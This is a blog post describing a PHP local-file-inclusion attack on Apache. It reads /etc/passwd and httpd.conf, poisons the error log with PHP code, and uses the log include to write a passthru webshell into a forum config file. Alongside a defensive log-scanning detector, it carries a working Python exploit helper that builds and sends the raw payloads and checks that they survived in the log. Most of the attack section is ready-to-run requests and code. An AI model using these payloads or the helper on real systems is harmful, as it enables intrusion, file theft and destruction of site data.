Source: http://2096.blogbus.com/index.html
Author: Zizzy
Including the Apache log through a PHP file-inclusion bug works because Apache records every requested URL in its log: if the request carries PHP statements, they land in the log file, and including that file executes them. The biggest drawback is that Apache logs tend to be very large, so the include can easily time out, and the method depends on a few conditions being met. Treat this as a research note.
Suppose a page has a PHP file-inclusion vulnerability, that is, an include statement driven by user input:
<? include($zizzy); ?>
You can then request
http://xxx.com/z.php?zizzy=/etc/inetd.conf
http://xxx.com/z.php?zizzy=/proc/cpuinfo
http://xxx.com/z.php?zizzy=/etc/passwd
and use the include statement to read parts of the system environment and the password file. Anything in the included file that is not between PHP tags is sent to the browser verbatim, so plain text files come back as-is.
Now let's look at the log contents.
Say the Apache configuration file is here:
/usr/local/apache/conf/httpd.conf
Include httpd.conf to find the path information:
http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf
This returns the Apache configuration, including the log locations of the virtual host:
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
</VirtualHost>
Submitting
http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log
reads the Apache error log:
[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not exist: /home/virtual/www.xxx.com/hack.php
[Tue Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not exist: /home/virtual/www.xxx.com/111111111.php
[Wed Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not exist: /home/virtual/www.xxx.com/22222.php3
[Wed Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke directory as script: /home/virtual/www.xxx.com/forum
[Fri Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke directory as script: /home/virtual/www.xxx.com/blog
[Fri Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke directory as script: /home/virtual/www.xxx.com/kkkkkkk
So the log files live under /home/virtual/www.xxx.com/logs/, and the error log records the path of every request for a file that does not exist.
For example, if we request
http://www.xxx.com/<?phpinfo();?>
the file certainly does not exist, so the error, with the PHP statement in the path, is recorded in the log. Now include the log again:
http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log
The log file now contains <?phpinfo();?>, so the include executes it and the phpinfo() output appears in the page.
Whether the statement lands in the error log intact depends on how the request is parsed and logged: the ? in the PHP tag is also the query-string separator, and browsers percent-encode < and other characters. So include the log once and look at what actually arrived; if the tags show up encoded (%3C%3F) or cut short, send the request raw with netcat or telnet, percent-encoding only what URL syntax would otherwise swallow (spaces as %20, the ? of the tags as %3F). The access log from the same httpd.conf (www-access_log) keeps the full request line and is the fallback if the error log does not keep the statement.
If the environment allows it, a command works the same way, for example <?system("ls -la /home");?>. A + in a URL path stays a literal +, it is not decoded to a space, so write the spaces as %20 rather than as +.
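From the defender's side, each step above leaves a distinct trace in the two log files named in the httpd.conf: the poisoned 404 in the error log, the include() of the log path in the access log, and later the ?cmd= requests to the dropped shell. The following detector is an added example, not code from the original post: it parses constructed sample lines in the error-log format shown above and in Apache's common access-log format (the format configured by CustomLog ... common) and flags those three patterns. The sample lines, IP addresses and the marker list are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Apache error-log line of the shape shown in the post:
#   [Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not exist: /path
ERROR_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] (?P<msg>.*)$")

# Apache "common" access-log line (CustomLog ... common in the httpd.conf above):
#   ip ident user [ts] "METHOD path PROTO" status bytes
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+$')

PHP_TAG_RE = re.compile(r"<\?(php\b|=)?", re.IGNORECASE)

# Values seen in the include() parameter during the attack described in the post
# (assumed marker list; extend it for your own environment).
LFI_MARKERS = ("../", "/etc/passwd", "/etc/inetd.conf", "/proc/", "httpd.conf",
               "/logs/", "_log")


def scan_error_line(line):
    """Flag error-log entries whose logged path carries a PHP open tag."""
    m = ERROR_RE.match(line)
    if not m:
        return None
    if PHP_TAG_RE.search(m.group("msg")):
        return {"ip": m.group("ip"), "kind": "php_tag_in_error_log",
                "detail": m.group("msg")}
    return None


def scan_access_line(line):
    """Flag PHP tags in the request line, LFI probes and webshell commands."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    parts = m.group("req").split(" ")
    # "GET /path HTTP/1.0": keep everything between method and protocol so a
    # path that was sent raw, spaces included, is not cut short.
    path = " ".join(parts[1:-1]) if len(parts) >= 3 else m.group("req")
    decoded = unquote(path)            # %3C%3F / %3F variants fold back to <?
    ip = m.group("ip")
    if PHP_TAG_RE.search(decoded):
        return {"ip": ip, "kind": "php_tag_in_request", "detail": decoded}
    query = decoded.partition("?")[2]
    if query:
        if any(marker in query for marker in LFI_MARKERS):
            return {"ip": ip, "kind": "lfi_probe", "detail": decoded}
        if re.search(r"(^|&)cmd=", query):
            return {"ip": ip, "kind": "webshell_command", "detail": decoded}
    return None


def scan(error_lines, access_lines):
    """Run both scanners and return the findings in log order."""
    findings = [f for f in map(scan_error_line, error_lines) if f]
    findings += [f for f in map(scan_access_line, access_lines) if f]
    return findings


# Constructed sample lines (not real log data): a benign 404, a poisoned 404,
# the poisoned request as logged in the access log, the LFI read of the error
# log, a webshell command and a benign hit.
SAMPLE_ERROR_LOG = [
    "[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not exist: /home/virtual/www.xxx.com/hack.php",
    "[Mon Jan 22 14:07:02 2005] [error] [client 10.0.0.5] File does not exist: /home/virtual/www.xxx.com/<?php phpinfo(); ?>",
]
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [22/Jan/2005:14:07:02 +0800] "GET /<%3Fphp%20phpinfo();%20%3F> HTTP/1.0" 404 291',
    '10.0.0.5 - - [22/Jan/2005:14:08:10 +0800] "GET /z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log HTTP/1.0" 200 48213',
    '10.0.0.5 - - [22/Jan/2005:14:09:30 +0800] "GET /forum/config.php?cmd=ls HTTP/1.0" 200 311',
    '10.0.0.7 - - [22/Jan/2005:14:10:00 +0800] "GET /index.php HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_ERROR_LOG, SAMPLE_ACCESS_LOG):
        print(f["kind"], f["ip"], f["detail"])
```

Running it on the samples prints one finding per attack step and nothing for the benign lines; the access-log scanner decodes the request first, so the %3F and %3C%3F spellings of the tags are caught as well.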
Divergent thinking:
The next step is writing a webshell so the access is reusable.
The precondition is a file the web server can write: it must be writable by the user Apache runs as (the User/Group lines in the httpd.conf above), and a world-writable -rwxrwxrwx (777) file is the easy case. The directory listing from the ls -la above shows the permissions directly.
For example, this PHP statement:
<?=str_replace("?","!",passthru($cmd));?>
passthru() writes the command output straight to the response and returns nothing, so the str_replace() around it is decoration; the shell works because passthru() has already printed. The bare $cmd relies on register_globals; with it off, use $_GET['cmd'].
You may have thought of this already; it is a good solution. Next, let's look at how to write it out. Open /home/virtual/www.xxx.com/forum/config.php with fopen() and write the statement above into it. The inner statement contains double quotes, so it must not sit inside a double-quoted fputs() string; put it in single quotes. The combined statement is
<? $fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+"); fputs($fp,'<?=str_replace("?","!",passthru($cmd));?>'); fclose($fp); ?>
Note that "w+" truncates config.php, so the forum's own configuration is destroyed.
We submit this statement so that it is recorded in the log:
http://xxx.com/z.php?zizzy=<? $fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+"); fputs($fp,'<?=str_replace("?","!",passthru($cmd));?>'); fclose($fp); ?>
Here the statement travels through PHP as the zizzy parameter, and the failed include() is what gets logged (PHP warnings reach the Apache error log when log_errors is on and no separate error_log is set). One thing to check first: if magic_quotes_gpc is on, PHP puts a backslash before every quote in GET data, so the quotes in the statement arrive as \" and \' and the code will not parse; the phpinfo() output from the previous step shows the setting. If it is on, send the statement as a request path that 404s, as with phpinfo() above, which PHP never touches. Once the statement sits in the log unmangled, including the log writes the one-line trojan into config.php.
Submit again:
http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log
Including the log runs the fopen() statement and the webshell is written. Bear in mind that every PHP fragment logged earlier (the phpinfo() and the ls above) runs again each time the log is included.
OK.
http://www.xxx.com/forum/config.php is now our webshell.
http://www.xxx.com/forum/config.php?cmd=ls runs ls through it.
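The two log-poisoning steps above, getting <?phpinfo();?> and then the fopen() statement into the error log, share the same mechanics: the fragment must reach the server byte-for-byte, and you must confirm what the log actually holds before including it. The following helper is an added example and not the original post's code. It assumes the placeholder names from the post (www.xxx.com, z.php, the zizzy parameter, the log and config.php paths from the httpd.conf above) and labels as an assumption the Apache behaviour it relies on (decoding %3F and %20 in the path before logging a missing file). It builds the raw request, builds the shell-writing statement with balanced quotes, and classifies how the fragment shows up in a fetched log.

```python
import socket
from urllib.parse import quote

# Placeholders taken from the post (none of them real); everything else here
# is an assumption made for this example.
HOST = "www.xxx.com"
PORT = 80
LFI_PATH = "/z.php?zizzy="                                  # the include($zizzy) page
ERROR_LOG = "/home/virtual/www.xxx.com/logs/www-error_log"  # ErrorLog from httpd.conf
TARGET = "/home/virtual/www.xxx.com/forum/config.php"       # the writable file


def phpinfo_payload():
    """First probe: proves the log is included and parsed as PHP."""
    return "<?php phpinfo(); ?>"


def webshell_writer_payload(target=TARGET):
    """PHP that writes the post's one-line shell into `target`.

    The shell is wrapped in single quotes so the double quotes inside it do
    not end the fputs() string; $_GET["cmd"] replaces the bare $cmd, which
    only resolves when register_globals is on.
    """
    shell = '<?=str_replace("?","!",passthru($_GET["cmd"]));?>'
    return "<?php $fp=fopen('%s','w+');fputs($fp,'%s');fclose($fp);?>" % (target, shell)


def path_for(payload):
    """Request path that 404s and carries the fragment into the error log.

    A raw space ends the request URI and a raw ? starts the query string, so
    both are percent-encoded; everything else is sent literally. Assumption:
    Apache decodes the path before logging "File does not exist: ...", so
    %3F comes back as ? in the log. Confirm with payload_survived() before
    relying on it (newer Apache builds with strict request parsing may also
    reject the raw < with a 400).
    """
    return "/" + payload.replace(" ", "%20").replace("?", "%3F")


def raw_get_request(path, host=HOST):
    """HTTP/1.0 request carrying `path` byte-for-byte (no client-side encoding)."""
    return ("GET %s HTTP/1.0\r\nHost: %s\r\n\r\n" % (path, host)).encode("latin-1")


def send_raw(request, host=HOST, port=PORT, timeout=10):
    """Send prebuilt request bytes and return the whole response (network)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            chunk = sock.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def payload_survived(log_text, payload):
    """How a fragment shows up in the log fetched through the include.

    'intact'  - the tags arrived literally; including the log will run it
    'escaped' - backslashes before quotes: magic_quotes_gpc mangled it (PHP route)
    'encoded' - %3C%3F or <%3F instead of <?: the encoding was kept, not decoded
    'absent'  - not there; wrong log file or the request was never logged
    """
    if payload in log_text:
        return "intact"
    if payload.replace('"', '\\"').replace("'", "\\'") in log_text:
        return "escaped"
    upper = log_text.upper()
    if "%3C%3F" in upper or "<%3F" in upper:
        return "encoded"
    return "absent"


def include_log_url(host=HOST, log=ERROR_LOG):
    """URL that makes z.php include the error log and execute whatever was logged."""
    return "http://%s%s%s" % (host, LFI_PATH, quote(log, safe="/"))


if __name__ == "__main__":
    print(raw_get_request(path_for(phpinfo_payload())).decode("latin-1"))
    print(raw_get_request(path_for(webshell_writer_payload())).decode("latin-1"))
    print(include_log_url())
```

Usage is the order of the post: send raw_get_request(path_for(phpinfo_payload())) with send_raw(), fetch include_log_url() and run payload_survived() on the body; only when it reports intact send the webshell writer the same way and include the log once more. An escaped result means the fragment went through PHP with magic_quotes_gpc on, an encoded one means the server kept the percent-encoding and the literal bytes must be sent instead.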